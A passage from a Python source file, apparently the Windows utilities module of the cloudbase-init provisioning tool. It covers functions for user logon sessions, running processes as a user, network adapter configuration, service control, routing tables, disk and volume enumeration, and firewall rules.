elif ret_val == self.ERROR_NO_SUCH_MEMBER:
raise exception.CloudbaseInitException("Username '%s' not found"
% username)
elif ret_val == self.ERROR_MEMBER_IN_ALIAS:
# The user is already a member of the group
pass
elif ret_val == self.ERROR_INVALID_MEMBER:
raise exception.CloudbaseInitException('Invalid user')
elif ret_val != 0:
raise exception.CloudbaseInitException('Unknown error')
def get_user_sid(self, username):
try:
user_info = self._get_user_info(username, 4)
return str(user_info["user_sid"])[6:]
except exception.ItemNotFoundException:
# User not found
pass
def create_user_logon_session(self, username, password, domain='.',
load_profile=True,
logon_type=LOGON32_LOGON_INTERACTIVE):
LOG.debug("Creating logon session for user: %(domain)s\\%(username)s",
{"username": username, "domain": domain})
token = wintypes.HANDLE()
ret_val = advapi32.LogonUserW(six.text_type(username),
six.text_type(domain),
six.text_type(password),
logon_type,
self.LOGON32_PROVIDER_DEFAULT,
ctypes.byref(token))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"User logon failed: %r")
if load_profile:
pi = Win32_PROFILEINFO()
pi.dwSize = ctypes.sizeof(Win32_PROFILEINFO)
pi.lpUserName = six.text_type(username)
ret_val = userenv.LoadUserProfileW(token, ctypes.byref(pi))
if not ret_val:
kernel32.CloseHandle(token)
raise exception.WindowsCloudbaseInitException(
"Cannot load user profile: %r")
return token
def get_current_user(self):
"""Get the user account name from the underlying instance."""
buf_len = wintypes.ULONG(512)
buf = ctypes.create_unicode_buffer(512)
ret_val = secur32.GetUserNameExW(
self.EXTENDED_NAME_FORMAT_SAM_COMPATIBLE,
buf, ctypes.byref(buf_len))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"GetUserNameExW failed: %r")
return buf.value.split("\\")
def execute_process_as_user(self, token, args, wait=True,
new_console=False):
"""Executes processes as an user.
:param token: Represents the user logon session token, resulted from
running the 'create_user_logon_session' method.
:param args: The arguments with which the process will be run with.
:param wait: Specifies if it's needed to wait for the process
handler to finish up running all the operations
on the process object.
:param new_console: Specifies whether the process should run
under a new console or not.
:return: The exit code value resulted from the running process.
:rtype: int
"""
LOG.debug("Executing process as user, command line: %s", args)
proc_info = Win32_PROCESS_INFORMATION()
startup_info = Win32_STARTUPINFO_W()
startup_info.cb = ctypes.sizeof(Win32_STARTUPINFO_W)
startup_info.lpDesktop = ""
flags = self.CREATE_NEW_CONSOLE if new_console else 0
cmdline = ctypes.create_unicode_buffer(subprocess.list2cmdline(args))
try:
ret_val = advapi32.CreateProcessAsUserW(
token, None, cmdline, None, None, False, flags, None, None,
ctypes.byref(startup_info), ctypes.byref(proc_info))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"CreateProcessAsUserW failed: %r")
if wait and proc_info.hProcess:
kernel32.WaitForSingleObject(
proc_info.hProcess, self.INFINITE)
exit_code = wintypes.DWORD()
if not kernel32.GetExitCodeProcess(
proc_info.hProcess, ctypes.byref(exit_code)):
raise exception.WindowsCloudbaseInitException(
"GetExitCodeProcess failed: %r")
return exit_code.value
finally:
if proc_info.hProcess:
kernel32.CloseHandle(proc_info.hProcess)
if proc_info.hThread:
kernel32.CloseHandle(proc_info.hThread)
def close_user_logon_session(self, token):
kernel32.CloseHandle(token)
def get_user_home(self, username):
user_sid = self.get_user_sid(username)
if user_sid:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, 'SOFTWARE\\'
'Microsoft\\Windows NT\\CurrentVersion\\'
'ProfileList\\%s' % user_sid) as key:
return winreg.QueryValueEx(key, 'ProfileImagePath')[0]
LOG.debug('Home directory not found for user %r', username)
return None
def sanitize_shell_input(self, value):
return value.replace('"', '\\"')
def set_host_name(self, new_host_name):
ret_val = kernel32.SetComputerNameExW(
self.ComputerNamePhysicalDnsHostname,
six.text_type(new_host_name))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"Cannot set host name: %r")
return True
def get_network_adapters(self):
"""Return available adapters as a list of tuples of (name, mac)."""
conn = wmi.WMI(moniker='//./root/cimv2')
# Get Ethernet adapters only
wql = ('SELECT * FROM Win32_NetworkAdapter WHERE '
'AdapterTypeId = 0 AND MACAddress IS NOT NULL')
if self.check_os_version(6, 0):
wql += ' AND PhysicalAdapter = True'
q = conn.query(wql)
return [(r.NetConnectionID, r.MACAddress) for r in q]
def get_dhcp_hosts_in_use(self):
dhcp_hosts = []
for net_addr in network.get_adapter_addresses():
if net_addr["dhcp_enabled"] and net_addr["dhcp_server"]:
dhcp_hosts.append((net_addr["friendly_name"],
net_addr["mac_address"],
net_addr["dhcp_server"]))
return dhcp_hosts
def set_ntp_client_config(self, ntp_hosts):
base_dir = self._get_system_dir()
w32tm_path = os.path.join(base_dir, "w32tm.exe")
# Convert the NTP hosts list to a string, in order to pass
# it to w32tm.
ntp_hosts = ",".join(ntp_hosts)
args = [w32tm_path, '/config', '/manualpeerlist:%s' % ntp_hosts,
'/syncfromflags:manual', '/update']
(out, err, ret_val) = self.execute_process(args, shell=False)
if ret_val:
raise exception.CloudbaseInitException(
'w32tm failed to configure NTP.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
@retry_decorator.retry_decorator(
max_retry_count=30, exceptions=exception.ItemNotFoundException)
def get_network_adapter_name_by_mac_address(self, mac_address):
iface_index_list = [
net_addr for net_addr
in network.get_adapter_addresses()
if net_addr["mac_address"] is not None and
net_addr["mac_address"].lower() == mac_address.lower()]
if not iface_index_list:
raise exception.ItemNotFoundException(
'Network interface with MAC address "%s" not found' %
mac_address)
if len(iface_index_list) > 1:
raise exception.CloudbaseInitException(
'Multiple network interfaces with MAC address "%s" exist' %
mac_address)
return iface_index_list[0]["friendly_name"]
@retry_decorator.retry_decorator(
max_retry_count=3, exceptions=exception.ItemNotFoundException)
def set_network_adapter_mtu(self, name, mtu):
if not self.check_os_version(6, 0):
raise exception.CloudbaseInitException(
'Setting the MTU is currently not supported on Windows XP '
'and Windows Server 2003')
iface_index_list = [
net_addr["interface_index"] for net_addr
in network.get_adapter_addresses()
if net_addr["friendly_name"] == name]
if not iface_index_list:
raise exception.ItemNotFoundException(
'Network interface with name "%s" not found' %
name)
else:
iface_index = iface_index_list[0]
LOG.debug('Setting MTU for interface "%(name)s" with '
'value "%(mtu)s"',
{'name': name, 'mtu': mtu})
base_dir = self._get_system_dir()
netsh_path = os.path.join(base_dir, 'netsh.exe')
args = [netsh_path, "interface", "ipv4", "set", "subinterface",
str(iface_index), "mtu=%s" % mtu,
"store=persistent"]
(out, err, ret_val) = self.execute_process(args, shell=False)
if ret_val:
raise exception.CloudbaseInitException(
'Setting MTU for interface "%(name)s" with '
'value "%(mtu)s" failed' % {'name': name, 'mtu': mtu})
def rename_network_adapter(self, old_name, new_name):
base_dir = self._get_system_dir()
netsh_path = os.path.join(base_dir, 'netsh.exe')
args = [netsh_path, "interface", "set", "interface",
'name=%s' % old_name, 'newname=%s' % new_name]
(out, err, ret_val) = self.execute_process(args, shell=False)
if ret_val:
raise exception.CloudbaseInitException(
'Renaming interface "%(old_name)s" to "%(new_name)s" '
'failed' % {'old_name': old_name, 'new_name': new_name})
@staticmethod
def _get_network_adapter(name):
conn = wmi.WMI(moniker='//./root/cimv2')
query = conn.Win32_NetworkAdapter(NetConnectionID=name)
if not len(query):
raise exception.CloudbaseInitException(
"Network adapter not found: %s" % name)
return query[0]
@staticmethod
def _set_static_network_config_legacy(name, address, netmask, gateway,
dnsnameservers):
if netaddr.valid_ipv6(address):
LOG.warning("Setting IPv6 info not available on this system")
return
adapter_config = WindowsUtils._get_network_adapter(name).associators(
wmi_result_class='Win32_NetworkAdapterConfiguration')[0]
LOG.debug("Setting static IP address")
(ret_val,) = adapter_config.EnableStatic([address], [netmask])
if ret_val > 1:
raise exception.CloudbaseInitException(
"Cannot set static IP address on network adapter: %d" %
ret_val)
reboot_required = (ret_val == 1)
if gateway:
LOG.debug("Setting static gateways")
(ret_val,) = adapter_config.SetGateways([gateway], [1])
if ret_val > 1:
raise exception.CloudbaseInitException(
"Cannot set gateway on network adapter: %d" % ret_val)
reboot_required = reboot_required or ret_val == 1
if dnsnameservers:
LOG.debug("Setting static DNS servers")
(ret_val,) = adapter_config.SetDNSServerSearchOrder(dnsnameservers)
if ret_val > 1:
raise exception.CloudbaseInitException(
"Cannot set DNS on network adapter: %d" % ret_val)
reboot_required = reboot_required or ret_val == 1
return reboot_required
@staticmethod
def _fix_network_adapter_dhcp(interface_name, enable_dhcp, address_family):
interface_id = WindowsUtils._get_network_adapter(interface_name).GUID
tcpip_key = "Tcpip6" if address_family == AF_INET6 else "Tcpip"
with winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\services\\%(tcpip_key)s\\"
"Parameters\\Interfaces\\%(interface_id)s" %
{"tcpip_key": tcpip_key, "interface_id": interface_id},
0, winreg.KEY_SET_VALUE) as key:
winreg.SetValueEx(
key, 'EnableDHCP', 0, winreg.REG_DWORD,
1 if enable_dhcp else 0)
@staticmethod
def _set_interface_dns(interface_name, dnsnameservers):
# Import here to avoid loading errors on Windows versions where MI is
# not available
import mi
conn = wmi.WMI(moniker='//./root/standardcimv2')
# Requires Windows >= 6.2
dns_client = conn.MSFT_DnsClientServerAddress(
InterfaceAlias=interface_name)
if not len(dns_client):
raise exception.ItemNotFoundException(
'Network interface with name "%s" not found' %
interface_name)
dns_client = dns_client[0]
custom_options = [{
u'name': u'ServerAddresses',
u'value_type': mi.MI_ARRAY | mi.MI_STRING,
u'value': dnsnameservers
}]
operation_options = {u'custom_options': custom_options}
dns_client.put(operation_options=operation_options)
def enable_network_adapter(self, name, enabled):
adapter = self._get_network_adapter(name)
if enabled:
adapter.Enable()
else:
adapter.Disable()
@staticmethod
def _set_static_network_config(name, address, prefix_len, gateway):
if netaddr.valid_ipv6(address):
family = AF_INET6
else:
family = AF_INET
# This is needed to avoid the error:
# "Inconsistent parameters PolicyStore PersistentStore and
# Dhcp Enabled"
WindowsUtils._fix_network_adapter_dhcp(name, False, family)
conn = wmi.WMI(moniker='//./root/standardcimv2')
existing_addresses = conn.MSFT_NetIPAddress(
AddressFamily=family, InterfaceAlias=name)
for existing_address in existing_addresses:
LOG.debug(
"Removing existing IP address \"%(ip)s\" "
"from adapter \"%(name)s\"",
{"ip": existing_address.IPAddress, "name": name})
existing_address.Delete_()
existing_routes = conn.MSFT_NetRoute(
AddressFamily=family, InterfaceAlias=name)
for existing_route in existing_routes:
LOG.debug(
"Removing existing route \"%(route)s\" "
"from adapter \"%(name)s\"",
{"route": existing_route.DestinationPrefix, "name": name})
existing_route.Delete_()
conn.MSFT_NetIPAddress.create(
AddressFamily=family, InterfaceAlias=name, IPAddress=address,
PrefixLength=prefix_len, DefaultGateway=gateway)
def set_static_network_config(self, name, address, prefix_len_or_netmask,
gateway, dnsnameservers):
ip_network = netaddr.IPNetwork(
u"%s/%s" % (address, prefix_len_or_netmask))
prefix_len = ip_network.prefixlen
netmask = str(ip_network.netmask)
if self.check_os_version(6, 2):
self._set_static_network_config(
name, address, prefix_len, gateway)
if len(dnsnameservers):
self._set_interface_dns(name, dnsnameservers)
else:
return self._set_static_network_config_legacy(
name, address, netmask, gateway, dnsnameservers)
def _get_network_team_manager(self):
if self._network_team_manager:
return self._network_team_manager
team_managers = [
"cloudbaseinit.utils.windows.netlbfo.NetLBFOTeamManager",
]
cl = classloader.ClassLoader()
for class_name in team_managers:
try:
cls = cl.load_class(class_name)
if cls.is_available():
self._network_team_manager = cls()
return self._network_team_manager
except Exception as ex:
LOG.exception(ex)
raise exception.ItemNotFoundException(
"No network team manager available")
def create_network_team(self, team_name, mode, load_balancing_algorithm,
members, mac_address, primary_nic_name=None,
primary_nic_vlan_id=None, lacp_timer=None):
self._get_network_team_manager().create_team(
team_name, mode, load_balancing_algorithm, members, mac_address,
primary_nic_name, primary_nic_vlan_id, lacp_timer)
def add_network_team_nic(self, team_name, nic_name, vlan_id):
self._get_network_team_manager().add_team_nic(
team_name, nic_name, vlan_id)
def _get_config_key_name(self, section):
key_name = self._config_key
if section:
key_name += section.replace('/', '\\') + '\\'
return key_name
def set_config_value(self, name, value, section=None):
key_name = self._get_config_key_name(section)
with winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE,
key_name) as key:
if type(value) == int:
regtype = winreg.REG_DWORD
else:
regtype = winreg.REG_SZ
winreg.SetValueEx(key, name, 0, regtype, value)
def get_config_value(self, name, section=None):
key_name = self._get_config_key_name(section)
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
key_name) as key:
(value, regtype) = winreg.QueryValueEx(key, name)
return value
except WindowsError:
return None
def wait_for_boot_completion(self):
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
"SYSTEM\\Setup\\Status\\SysprepStatus", 0,
winreg.KEY_READ) as key:
while True:
gen_state = winreg.QueryValueEx(key,
"GeneralizationState")[0]
if gen_state == 7:
break
time.sleep(1)
LOG.info('Waiting for sysprep completion. '
'GeneralizationState: %d', gen_state)
except WindowsError as ex:
if ex.winerror == 2:
LOG.debug('Sysprep data not found in the registry, '
'skipping sysprep completion check.')
else:
raise ex
def check_service_exists(self, service_name):
LOG.debug("Checking if service exists: %s", service_name)
try:
with self._get_service_handle(service_name):
return True
except pywintypes.error as ex:
if ex.winerror == winerror.ERROR_SERVICE_DOES_NOT_EXIST:
return False
raise
def get_service_status(self, service_name):
LOG.debug("Getting service status for: %s", service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_QUERY_STATUS) as hs:
service_status = win32service.QueryServiceStatusEx(hs)
state = service_status['CurrentState']
return self._SERVICE_STATUS_MAP.get(
state, WindowsUtils.SERVICE_STATUS_UNKNOWN)
def get_service_start_mode(self, service_name):
LOG.debug("Getting service start mode for: %s", service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_QUERY_CONFIG) as hs:
service_config = win32service.QueryServiceConfig(hs)
start_type = service_config[1]
return [k for k, v in self._SERVICE_START_TYPE_MAP.items()
if v == start_type][0]
def set_service_start_mode(self, service_name, start_mode):
# TODO(alexpilotti): Handle the "Delayed Start" case
LOG.debug("Setting service start mode for: %s", service_name)
start_type = self._get_win32_start_type(start_mode)
with self._get_service_handle(
service_name, win32service.SERVICE_CHANGE_CONFIG) as hs:
win32service.ChangeServiceConfig(
hs, win32service.SERVICE_NO_CHANGE,
start_type, win32service.SERVICE_NO_CHANGE,
None, None, False, None, None, None, None)
def start_service(self, service_name):
LOG.debug('Starting service %s', service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_START) as hs:
win32service.StartService(hs, service_name)
def stop_service(self, service_name, wait=False):
LOG.debug('Stopping service %s', service_name)
with self._get_service_handle(
service_name,
win32service.SERVICE_STOP |
win32service.SERVICE_QUERY_STATUS) as hs:
win32service.ControlService(hs, win32service.SERVICE_CONTROL_STOP)
if wait:
while True:
service_status = win32service.QueryServiceStatusEx(hs)
state = service_status['CurrentState']
if state == win32service.SERVICE_STOPPED:
return
time.sleep(.1)
@staticmethod
@contextlib.contextmanager
def _get_service_control_manager(
scm_access=win32service.SC_MANAGER_CONNECT):
hscm = win32service.OpenSCManager(None, None, scm_access)
try:
yield hscm
finally:
win32service.CloseServiceHandle(hscm)
@staticmethod
@contextlib.contextmanager
def _get_service_handle(service_name,
service_access=win32service.SERVICE_QUERY_CONFIG,
scm_access=win32service.SC_MANAGER_CONNECT):
with WindowsUtils._get_service_control_manager(scm_access) as hscm:
hs = win32service.OpenService(hscm, service_name, service_access)
try:
yield hs
finally:
win32service.CloseServiceHandle(hs)
@staticmethod
def _get_win32_start_type(start_mode):
start_type = WindowsUtils._SERVICE_START_TYPE_MAP.get(start_mode)
if not start_type:
raise exception.InvalidStateException(
"Invalid service start mode: %s" % start_mode)
return start_type
def create_service(self, service_name, display_name, path, start_mode,
username=None, password=None):
LOG.debug('Creating service %s', service_name)
start_type = self._get_win32_start_type(start_mode)
with WindowsUtils._get_service_control_manager(
scm_access=win32service.SC_MANAGER_CREATE_SERVICE) as hscm:
hs = win32service.CreateService(
hscm, service_name, display_name,
win32service.SERVICE_ALL_ACCESS,
win32service.SERVICE_WIN32_OWN_PROCESS,
start_type,
win32service.SERVICE_ERROR_NORMAL,
path, None, False, None,
username, password)
win32service.CloseServiceHandle(hs)
def delete_service(self, service_name):
LOG.debug('Deleting service %s', service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_ALL_ACCESS) as hs:
win32service.DeleteService(hs)
def set_service_credentials(self, service_name, username, password):
LOG.debug('Setting service credentials: %s', service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_CHANGE_CONFIG) as hs:
win32service.ChangeServiceConfig(
hs,
win32service.SERVICE_NO_CHANGE,
win32service.SERVICE_NO_CHANGE,
win32service.SERVICE_NO_CHANGE,
None,
None,
False,
None,
username,
password,
None)
def get_service_username(self, service_name):
LOG.debug('Getting service username: %s', service_name)
with self._get_service_handle(service_name) as hs:
cfg = win32service.QueryServiceConfig(hs)
return cfg[7]
def reset_service_password(self):
"""This is needed to avoid pass the hash attacks."""
if not self.check_service_exists(self._service_name):
LOG.info("Service does not exist: %s", self._service_name)
return None
service_username = self.get_service_username(self._service_name)
# Ignore builtin accounts
if "\\" not in service_username:
LOG.info("Skipping password reset, service running as a built-in "
"account: %s", service_username)
return None
domain, username = service_username.split('\\')
if domain != ".":
LOG.info("Skipping password reset, service running as a domain "
"account: %s", service_username)
return None
LOG.debug('Resetting password for service user: %s', service_username)
maximum_length = self.get_maximum_password_length()
password = self.generate_random_password(maximum_length)
self.set_user_password(username, password)
self.set_service_credentials(
self._service_name, service_username, password)
return domain, username, password
def terminate(self):
# Wait for the service to start. Polling the service "Started" property
# is not enough
time.sleep(3)
self.stop_service(self._service_name)
def get_default_gateway(self):
default_routes = [r for r in self._get_ipv4_routing_table()
if r[0] == '0.0.0.0']
if default_routes:
return default_routes[0][3], default_routes[0][2]
else:
return None, None
@staticmethod
def _heap_alloc(heap, size):
table_mem = kernel32.HeapAlloc(heap, 0, ctypes.c_size_t(size.value))
if not table_mem:
raise exception.CloudbaseInitException(
'Unable to allocate memory for the IP forward table')
return table_mem
@contextlib.contextmanager
def _get_forward_table(self):
heap = kernel32.GetProcessHeap()
forward_table_size = ctypes.sizeof(Win32_MIB_IPFORWARDTABLE)
size = wintypes.ULONG(forward_table_size)
table_mem = self._heap_alloc(heap, size)
p_forward_table = ctypes.cast(
table_mem, ctypes.POINTER(Win32_MIB_IPFORWARDTABLE))
try:
err = iphlpapi.GetIpForwardTable(p_forward_table,
ctypes.byref(size), 0)
if err == self.ERROR_INSUFFICIENT_BUFFER:
kernel32.HeapFree(heap, 0, p_forward_table)
table_mem = self._heap_alloc(heap, size)
p_forward_table = ctypes.cast(
table_mem,
ctypes.POINTER(Win32_MIB_IPFORWARDTABLE))
err = iphlpapi.GetIpForwardTable(p_forward_table,
ctypes.byref(size), 0)
if err and err != kernel32.ERROR_NO_DATA:
raise exception.CloudbaseInitException(
'Unable to get IP forward table. Error: %s' % err)
yield p_forward_table
finally:
kernel32.HeapFree(heap, 0, p_forward_table)
def _get_ipv4_routing_table(self):
routing_table = []
with self._get_forward_table() as p_forward_table:
forward_table = p_forward_table.contents
table = ctypes.cast(
ctypes.addressof(forward_table.table),
ctypes.POINTER(Win32_MIB_IPFORWARDROW *
forward_table.dwNumEntries)).contents
for row in table:
destination = Ws2_32.inet_ntoa(
row.dwForwardDest).decode()
netmask = Ws2_32.inet_ntoa(
row.dwForwardMask).decode()
gateway = Ws2_32.inet_ntoa(
row.dwForwardNextHop).decode()
routing_table.append((
destination,
netmask,
gateway,
row.dwForwardIfIndex,
row.dwForwardMetric1))
return routing_table
def check_static_route_exists(self, destination):
return len([r for r in self._get_ipv4_routing_table()
if r[0] == destination]) > 0
def add_static_route(self, destination, mask, next_hop, interface_index,
metric):
args = ['ROUTE', 'ADD', destination, 'MASK', mask, next_hop]
(out, err, ret_val) = self.execute_process(args)
# Cannot use the return value to determine the outcome
if ret_val or err:
raise exception.CloudbaseInitException(
'Unable to add route: %s' % err)
def get_os_version(self):
vi = Win32_OSVERSIONINFOEX_W()
vi.dwOSVersionInfoSize = ctypes.sizeof(Win32_OSVERSIONINFOEX_W)
ret_val = ntdll.RtlGetVersion(ctypes.byref(vi))
if ret_val:
raise exception.WindowsCloudbaseInitException(
"RtlGetVersion failed with error: %s" % ret_val)
return {"major_version": vi.dwMajorVersion,
"minor_version": vi.dwMinorVersion,
"build_number": vi.dwBuildNumber,
"platform_id": vi.dwPlatformId,
"csd_version": vi.szCSDVersion,
"service_pack_major": vi.wServicePackMajor,
"service_pack_minor": vi.wServicePackMinor,
"suite_mask": vi.wSuiteMask,
"product_type": vi.wProductType}
def is_client_os(self):
return self.get_os_version()["product_type"] == self.VER_NT_WORKSTATION
def check_os_version(self, major, minor, build=0):
vi = Win32_OSVERSIONINFOEX_W()
vi.dwOSVersionInfoSize = ctypes.sizeof(Win32_OSVERSIONINFOEX_W)
vi.dwMajorVersion = major
vi.dwMinorVersion = minor
vi.dwBuildNumber = build
mask = 0
for type_mask in [VER_MAJORVERSION, VER_MINORVERSION, VER_BUILDNUMBER]:
mask = kernel32.VerSetConditionMask(mask, type_mask,
VER_GREATER_EQUAL)
type_mask = VER_MAJORVERSION | VER_MINORVERSION | VER_BUILDNUMBER
ret_val = ntdll.RtlVerifyVersionInfo(ctypes.byref(vi), type_mask, mask)
if not ret_val:
return True
elif ret_val == self.STATUS_REVISION_MISMATCH:
return False
else:
raise exception.CloudbaseInitException(
"RtlVerifyVersionInfo failed with error: %s" % ret_val)
def get_volume_label(self, drive):
max_label_size = 261
label = ctypes.create_unicode_buffer(max_label_size)
ret_val = kernel32.GetVolumeInformationW(six.text_type(drive), label,
max_label_size, 0, 0, 0, 0, 0)
if ret_val:
return label.value
def get_volume_path_names_by_mount_point(self, mount_point):
max_volume_name_len = 50
volume_name = ctypes.create_unicode_buffer(max_volume_name_len)
if not kernel32.GetVolumeNameForVolumeMountPointW(
six.text_type(mount_point), volume_name,
max_volume_name_len):
if kernel32.GetLastError() in [self.ERROR_INVALID_NAME,
self.ERROR_PATH_NOT_FOUND]:
raise exception.ItemNotFoundException(
"Mount point not found: %s" % mount_point)
else:
raise exception.WindowsCloudbaseInitException(
"Failed to get volume name for mount point: %s. "
"Error: %%r" % mount_point)
volume_path_names_len = wintypes.DWORD(100)
while True:
volume_path_names = ctypes.create_unicode_buffer(
volume_path_names_len.value)
if not kernel32.GetVolumePathNamesForVolumeNameW(
volume_name, volume_path_names, volume_path_names_len,
ctypes.byref(volume_path_names_len)):
if kernel32.GetLastError() == self.ERROR_MORE_DATA:
continue
else:
raise exception.WindowsCloudbaseInitException(
"Failed to get path names for volume name: %s."
"Error: %%r" % volume_name.value)
return [n for n in volume_path_names[
:volume_path_names_len.value - 1].split('\0') if n]
def generate_random_password(self, length):
if length < 3:
raise exception.CloudbaseInitException(
"Password can not have less than 3 characters!")
while True:
pwd = super(WindowsUtils, self).generate_random_password(length)
# Make sure that the Windows complexity requirements are met:
# http://technet.microsoft.com/en-us/library/cc786468(v=ws.10).aspx
valid = True
for r in ["[a-z]", "[A-Z]", "[0-9]"]:
if not re.search(r, pwd):
valid = False
if valid:
return pwd
def _split_str_buf_list(self, buf, buf_len):
i = 0
value = ''
values = []
while i < buf_len:
c = buf[i]
if c != '\x00':
value += c
else:
values.append(value)
value = ''
i += 1
return values
def get_logical_drives(self):
buf_size = self.MAX_PATH
buf = ctypes.create_unicode_buffer(buf_size + 1)
buf_len = kernel32.GetLogicalDriveStringsW(buf_size, buf)
if not buf_len:
raise exception.WindowsCloudbaseInitException(
"GetLogicalDriveStringsW failed: %r")
return self._split_str_buf_list(buf, buf_len)
def get_cdrom_drives(self):
drives = self.get_logical_drives()
return [d for d in drives if kernel32.GetDriveTypeW(d) ==
self.DRIVE_CDROM]
def _is_64bit_arch(self):
# interpreter's bits
return struct.calcsize("P") == 8
def get_physical_disks(self):
physical_disks = []
disk_guid = GUID_DEVINTERFACE_DISK
handle_disks = setupapi.SetupDiGetClassDevsW(
ctypes.byref(disk_guid), None, None,
self.DIGCF_PRESENT | self.DIGCF_DEVICEINTERFACE)
if handle_disks == self.INVALID_HANDLE_VALUE:
raise exception.CloudbaseInitException(
"SetupDiGetClassDevs failed")
try:
did = Win32_SP_DEVICE_INTERFACE_DATA()
did.cbSize = ctypes.sizeof(Win32_SP_DEVICE_INTERFACE_DATA)
index = 0
while setupapi.SetupDiEnumDeviceInterfaces(
handle_disks, None, ctypes.byref(disk_guid), index,
ctypes.byref(did)):
index += 1
handle_disk = self.INVALID_HANDLE_VALUE
required_size = wintypes.DWORD()
if not setupapi.SetupDiGetDeviceInterfaceDetailW(
handle_disks, ctypes.byref(did), None, 0,
ctypes.byref(required_size), None):
if (kernel32.GetLastError() !=
self.ERROR_INSUFFICIENT_BUFFER):
raise exception.WindowsCloudbaseInitException(
"SetupDiGetDeviceInterfaceDetailW failed: %r")
pdidd = ctypes.cast(
msvcrt.malloc(ctypes.c_size_t(required_size.value)),
ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W))
try:
pdidd.contents.cbSize = ctypes.sizeof(
Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W)
if not self._is_64bit_arch():
# NOTE(cpoieana): For some reason, on x86 platforms
# the alignment or content of the struct
# is not taken into consideration.
pdidd.contents.cbSize = 6
if not setupapi.SetupDiGetDeviceInterfaceDetailW(
handle_disks, ctypes.byref(did), pdidd,
required_size, None, None):
raise exception.WindowsCloudbaseInitException(
"SetupDiGetDeviceInterfaceDetailW failed: %r")
device_path = ctypes.cast(
pdidd.contents.DevicePath, wintypes.LPWSTR).value
handle_disk = kernel32.CreateFileW(
device_path, 0, self.FILE_SHARE_READ,
None, self.OPEN_EXISTING, 0, 0)
if handle_disk == self.INVALID_HANDLE_VALUE:
raise exception.CloudbaseInitException(
'CreateFileW failed')
sdn = Win32_STORAGE_DEVICE_NUMBER()
b = wintypes.DWORD()
if not kernel32.DeviceIoControl(
handle_disk, self.IOCTL_STORAGE_GET_DEVICE_NUMBER,
None, 0, ctypes.byref(sdn), ctypes.sizeof(sdn),
ctypes.byref(b), None):
raise exception.WindowsCloudbaseInitException(
'DeviceIoControl failed: %r')
physical_disks.append(
r"\\.\PHYSICALDRIVE%d" % sdn.DeviceNumber)
finally:
msvcrt.free(pdidd)
if handle_disk != self.INVALID_HANDLE_VALUE:
kernel32.CloseHandle(handle_disk)
finally:
setupapi.SetupDiDestroyDeviceInfoList(handle_disks)
return physical_disks
def get_volumes(self):
"""Retrieve a list with all the volumes found on all disks."""
volumes = []
volume = ctypes.create_unicode_buffer(chr(0) * self.MAX_PATH)
handle_volumes = kernel32.FindFirstVolumeW(volume, self.MAX_PATH)
if handle_volumes == self.INVALID_HANDLE_VALUE:
raise exception.WindowsCloudbaseInitException(
"FindFirstVolumeW failed: %r")
try:
while True:
volumes.append(volume.value)
found = kernel32.FindNextVolumeW(handle_volumes, volume,
self.MAX_PATH)
if not found:
errno = ctypes.GetLastError()
if errno == self.ERROR_NO_MORE_FILES:
break
else:
raise exception.WindowsCloudbaseInitException(
"FindNextVolumeW failed: %r")
finally:
kernel32.FindVolumeClose(handle_volumes)
return volumes
def _get_fw_protocol(self, protocol):
if protocol == self.PROTOCOL_TCP:
fw_protocol = self._FW_IP_PROTOCOL_TCP
elif protocol == self.PROTOCOL_UDP:
fw_protocol = self._FW_IP_PROTOCOL_UDP
else:
raise NotImplementedError("Unsupported protocol")
return fw_protocol
def firewall_create_rule(self, name, port, protocol, allow=True):
if not allow:
raise NotImplementedError()
fw_port = client.Dispatch("HNetCfg.FWOpenPort")
fw_port.Name = name
fw_port.Protocol = self._get_fw_protocol(protocol)
fw_port.Port = port
fw_port.Scope = self._FW_SCOPE_ALL
fw_port.Enabled = True
fw_mgr = client.Dispatch("HNetCfg.FwMgr")
fw_profile = fw_mgr.LocalPolicy.CurrentProfile
fw_profile = fw_profile.GloballyOpenPorts.Add(fw_port)
def firewall_remove_rule(self, name, port, protocol, allow=True):
if not allow:
raise NotImplementedError()
fw_mgr = client.Dispatch("HNetCfg.FwMgr")
fw_profile = fw_mgr.LocalPolicy.CurrentProfile
fw_protocol = self._get_fw_protocol(protocol)
fw_profile = fw_profile.GloballyOpenPorts.Remove(port, fw_protocol)
def is_wow64(self):
return win32process.IsWow64Process()
def get_system32_dir(self):
return os.path.expandvars('%windir%\\system32')
def get_syswow64_dir(self):
return os.path.expandvars('%windir%\\syswow64')
def get_sysnative_dir(self):
return os.path.expandvars('%windir%\\sysnative')
def check_sysnative_dir_exists(self):
sysnative_dir_exists = os.path.isdir(self.get_sysnative_dir())
if not sysnative_dir_exists and self.is_wow64():
LOG.warning('Unable to validate sysnative folder presence. '
'If Target OS is Server 2003 x64, please ensure '
'you have KB942589 installed')
return sysnative_dir_exists
def _get_system_dir(self, sysnative=True):
"""Return Windows system directory with compatibility support.
Depending on the interpreter bits and platform architecture,
the return value may vary between
C:\Windows\(System32|SysWOW64|Sysnative).
Note that "Sysnative" is just an alias (doesn't really exist on disk).
More info about this can be found in documentation.
"""
if sysnative and self.check_sysnative_dir_exists():
return self.get_sysnative_dir()
if not sysnative and self._is_64bit_arch():
return self.get_syswow64_dir()
return self.get_system32_dir()
def is_nano_server(self):
return self._check_server_level("NanoServer")
def _check_server_level(self, server_level):
try:
with winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows NT\\CurrentVersion\\Server\\"
"ServerLevels") as key:
return winreg.QueryValueEx(key, server_level)[0] == 1
except WindowsError as ex:
if ex.winerror == 2:
return False
else:
raise
def execute_powershell_script(self, script_path, sysnative=True):
base_dir = self._get_system_dir(sysnative)
powershell_path = os.path.join(base_dir,
